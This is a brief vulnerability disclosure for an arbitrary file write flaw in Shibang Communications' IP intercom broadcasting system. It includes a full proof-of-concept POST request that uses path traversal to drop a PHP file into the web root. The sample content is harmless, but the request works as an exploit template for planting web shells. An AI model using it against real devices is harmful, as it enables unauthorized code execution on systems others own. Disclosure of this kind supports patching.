There is an arbitrary file writing vulnerability in the IP network intercom broadcasting system of Shibang Communications Co., Ltd.
- Impact of vulnerabilities
IP network intercom broadcasting system
- Vulnerability location /php/busyscreenshotpush.php
Vulnerability recurrence
- Pass in the writing file path through the jsondata[callee] parameter, pass in the file name through jsondata[imagename], and finally pass in the base64 encoding of the writing content through jsondata[imagecontent]. The POC is as follows
POST /php/busyscreenshotpush.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
jsondata[caller]=1&jsondata[callee]=../../../../../ICPAS/Wnmp/WWW/php/&jsondata[imagename]=1_2_3.php&jsondata[imagecontent]=aGVsbG8=
- Visit /php/1_2_3.php
